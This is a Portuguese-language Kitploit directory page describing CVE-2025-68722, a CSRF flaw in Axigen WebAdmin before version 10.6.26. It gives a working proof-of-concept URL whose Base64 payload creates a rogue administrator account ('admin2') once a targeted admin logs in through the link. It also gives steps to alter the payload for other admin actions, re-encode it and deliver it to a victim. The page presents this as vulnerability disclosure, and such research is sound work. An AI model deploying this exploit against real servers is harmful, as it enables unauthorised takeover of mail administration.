Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68722 — Axigen WebAdmin CSRF Vulnerability | Kitploit
Ferramentas/GitHubGitHub/osmancanvural/cve-2025-68722
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF Vulnerability

Ver Repositório
há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68722: CSRF no Axigen WebAdmin

Resumo da Vulnerabilidade

Ações críticas que alteram o estado na interface Axigen WebAdmin são acessíveis via requisições GET. Embora o token _h proteja contra CSRF direto, a aplicação processa requisições enfileiradas através do parâmetro _s (breadcrumb) imediatamente após um usuário autenticar.

Um atacante pode criar uma URL contendo um payload codificado em Base64 no parâmetro _s. Se um administrador clicar neste link e completar o processo de login, a ação enfileirada é executada automaticamente no seu contexto.

Versões Afetadas: < 10.6.26

Para mais informações, veja a Base de Conhecimento da Axigen.


POC

URL Alvo: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

Payload Decodificado (parâmetro _s):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

Passos para Reproduzir:

  1. Modificar: Altere o payload JSON para atingir diferentes ações administrativas (ex.: alterar configurações do servidor).
  2. Codificar: Re-codifique o JSON modificado em Base64.
  3. Entregar: Substitua o valor do parâmetro _s na URL de ataque e entregue-a a um administrador alvo.
  4. Acionar: Ao fazer login através deste link, a conta admin2 é criada (ou sua ação personalizada é executada).

Baixar ferramenta